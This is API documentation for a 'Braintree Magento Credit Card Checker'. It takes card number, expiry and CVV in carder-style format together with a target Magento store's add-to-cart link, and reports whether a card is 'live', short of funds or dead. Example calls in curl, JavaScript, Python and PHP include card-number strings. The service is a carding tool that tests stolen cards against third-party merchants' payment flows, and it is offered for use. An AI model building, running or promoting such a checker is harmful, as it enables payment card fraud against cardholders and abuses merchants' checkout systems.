Test and explore the Braintree Magento Credit Card Checker API
GET : api.php
| Parameter | Type | Required | Description |
|---|---|---|---|
lista |
String | Yes | Credit card data in format: CC|MM|YYYY|CVV |
sec |
String | Yes | Braintree Magento #HQ Add To Cart Link |
| Code | Meaning |
|---|---|
| #CVV | Approved CVV - Card is live and valid with CVV match |
| #CCN | Approve CCN - Insufficient funds or wrong cvv code |
| #DECLINED | Declined - Card is invalid or dead |
curl -X GET "https://yourdomain.com/api.php?lista=4857200081213185|04|2029|438&sec=https://magento.example.com"
const cardData = "4857200081213185|04|2029|438";
const magentoUrl = "https://magento.example.com";
fetch(`https://yourdomain.com/api.php?lista=${encodeURIComponent(cardData)}&sec=${encodeURIComponent(magentoUrl)}`)
.then(response => response.text())
.then(data => console.log(data));
import requests
card = "4342561234567890|12|2028|123"
magento = "https://magento.example.com"
response = requests.get(f"https://yourdomain.com/api.php?lista={card}&sec={magento}")
print(response.text)
<?php
$card = "4342561234567890|12|2028|123";
$magento = "https://magento.example.com";
$response = file_get_contents("https://yourdomain.com/api.php?lista=" . urlencode($card) . "&sec=" . urlencode($magento));
echo $response;
?>